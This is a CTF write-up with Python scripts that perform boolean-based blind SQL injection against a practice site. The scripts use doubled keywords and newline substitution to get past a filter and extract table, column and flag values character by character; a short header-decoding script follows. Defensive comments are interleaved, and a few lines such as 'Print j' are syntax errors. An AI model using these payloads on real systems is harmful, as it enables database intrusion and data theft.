脚本爆破数据库步骤(sql例子 双写or)
# Step 1: recover the length of the current database name (CTF write-up).
import requests
# Marker string whose presence in the response body separates a true
# condition from a false one -- this is what makes the probe "boolean-based
# blind": nothing from the database is ever echoed, only yes/no.
str1 = 'You are in'
# CTF practice target; hard-coded, and reused verbatim by every script below.
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
for i in range(1,30):
    # One POST per candidate length; `id` is the injected parameter.
    # Defensive note: the doubled keyword spelling (`oorr`, per the page
    # title "双写or") indicates the server relies on stripping blacklisted
    # words from a string-concatenated query. Blacklists of this kind are
    # routinely defeated; parameterised queries remove the issue entirely.
    # Detection: a burst of POSTs to one endpoint whose `id` differs only
    # in a counter is a strong enumeration signal.
    key = {'id':"0'oorr(length(database())=%s)oorr'0"%i}
    r = requests.post(url, data=key).text
    print(i)
    if str1 in r:
        print('the length of database is %s'%i)
        break
# Step 2: recover the database name one character at a time.
import requests
# Candidate alphabet tried at each position, in this order.
guess = '~abcdefghijklmnopqrstuvwxyz_0123456789'
# Marker string in the response body that indicates a true condition.
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
database = ''
# Upper bound 19 presumably comes from the length found in the previous
# step -- inferred, not shown here.
for i in range(1,19):
    for j in guess:
        # mid(...) from(i) for(1) compares the single character at position
        # i with the candidate j. Each position costs up to len(guess)
        # requests, which is why this traffic pattern (many POSTs, one
        # character changing) is easy to alert on server-side.
        key = {'id':"0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0" %(i,j)}
        r = requests.post(url, data=key).text
        print(key)
        if str1 in r:
            database += j
            Print j
            break
Print database
# Step 3: recover the total length of the table-name list for the current
# schema, read from information_schema.tables.
import requests
# Marker string in the response body that indicates a true condition.
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
for i in range(1,30):
    # group_concat(... separator '@') joins all table names into one string
    # so a single length comparison covers them all.
    key = {'id':"0'oorr((select(length(group_concat(table_name separatoorr '@')))from(infoorrmation_schema.tables)where(table_schema)=database())=%s)oorr'0"%i}
    # Spaces are swapped for newlines before sending -- presumably to get
    # past a filter on the space character (inferred from the substitution,
    # not shown). Defensive note: whitespace blacklists are as fragile as
    # keyword blacklists; only parameterisation removes the injection point.
    # Least privilege also helps here: a DB account scoped to the
    # application's own tables limits what metadata can be enumerated.
    key['id'] = key['id'].replace(' ', chr(0x0a))
    r = requests.post(url, data=key).text
    print i
    if str1 in r:
        print 'the length of tables is %s'%i
        break
# Step 4: recover the '@'-joined table-name list one character at a time.
import requests
# Candidate alphabet tried at each position, in this order.
guess = '~abcdefghijklmnopqrstuvwxyz_0123456789'
# Marker string in the response body that indicates a true condition.
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
tables = ''
# Upper bound 11 presumably comes from the length found in the previous
# step -- inferred, not shown here.
for i in range(1,11):
    for j in guess:
        # mid(group_concat(...) from(i) for(1)) isolates the character at
        # position i of the joined list and compares it with candidate j.
        flag = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"%(i, j)
        # Spaces replaced by newlines before sending (same substitution as
        # the length probe; purpose inferred).
        flag = flag.replace(' ', chr(0x0a))
        key = {'id':flag}
        r = requests.post(url, data=key).text
        print key
        if str1 in r:
            tables += j
            print j
            break
print tables
# Step 5: recover the total length of the '@'-joined column-name list for
# the table literally named 'fiag', read from information_schema.columns.
import requests
# Marker string in the response body that indicates a true condition.
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
for i in range(1,30):
    key = {'id':"0'oorr((select(length(group_concat(column_name separatoorr '@')))from(infoorrmation_schema.columns)where(table_name)='fiag')=%s)oorr'0"%i}
    # Spaces replaced by newlines before sending (purpose inferred).
    key['id'] = key['id'].replace(' ', chr(0x0a))
    r = requests.post(url, data=key).text
    print i
    if str1 in r:
        # NOTE(review): the message says "tables" but this loop measures the
        # column-name list; copied from the table-length script.
        print 'the length of tables is %s'%i
        break
# Step 6: recover the '@'-joined column-name list of table 'fiag' one
# character at a time.
import requests
# Wider candidate alphabet than the earlier steps: column names here may
# contain punctuation.
guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
# Marker string in the response body that indicates a true condition.
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
columns = ''
# Upper bound 6 presumably comes from the length found in the previous
# step -- inferred, not shown here.
for i in range(1,6):
    for j in guess:
        flag = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"%(i, j)
        # Spaces replaced by newlines before sending (purpose inferred).
        flag = flag.replace(' ', chr(0x0a))
        key = {'id':flag}
        r = requests.post(url, data=key).text
        print key
        if str1 in r:
            columns += j
            print j
            break
# Step 7: recover the length of the value in column fl$4g of table fiag.
import requests
# Marker string in the response body that indicates a true condition.
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
for i in range(1,30):
    # Defensive note: once schema and column names are known, a boolean
    # oracle reads arbitrary data -- the write-up's steps 3-6 exist only to
    # reach this point. Logging and rate-limiting repeated near-identical
    # requests on the injectable endpoint would have cut this short.
    key = {'id':"0'oorr((select(length(fl$4g))from(fiag))=%s)oorr'0"%i}
    # Spaces replaced by newlines before sending (purpose inferred).
    key['id'] = key['id'].replace(' ', chr(0x0a))
    r = requests.post(url, data=key).text
    print i
    if str1 in r:
        print 'the length of flag is %s'%i
        break
# Step 8: recover the value of fl$4g one character at a time.
import requests
# Candidate alphabet tried at each position, in this order (ends with a
# literal space).
guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],. '
# Marker string in the response body that indicates a true condition.
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
flag = ''
# Upper bound 20 presumably comes from the length found in the previous
# step -- inferred, not shown here.
for i in range(1,20):
    for j in guess:
        key = {'id':"0'oorr((select(mid(fl$4g from(%s)foorr(1)))from(fiag))='%s')oorr'0"%(i, j)}
        # Spaces replaced by newlines before sending (purpose inferred).
        key['id'] = key['id'].replace(' ', chr(0x0a))
        r = requests.post(url, data=key).text
        print key
        if str1 in r:
            flag += j
            print j
            break
print flag
获取header,并post发送内容脚本
# Second challenge: a secret is handed out in a response header, decoded
# client-side and posted back as the answer.
import requests
import base64
r = requests.post('http://ctf5.shiyanbar.com/web/10/10.php')
# Raises KeyError if the header is absent -- the script assumes the server
# always sets FLAG.
key = r.headers['FLAG']
# Header value is base64; the decoded text is split on ':' and the second
# field taken. Both steps trust the server's formatting unconditionally.
# Defensive note: anything a client can decode and replay is not a secret;
# a server-issued token must be bound to the session and verified
# server-side rather than reconstructed from a readable header.
flag = base64.b64decode(key).decode().split(':')[1]
para = {'key':flag}
r = requests.post('http://ctf5.shiyanbar.com/web/10/10.php',data = para)
print(r.text)
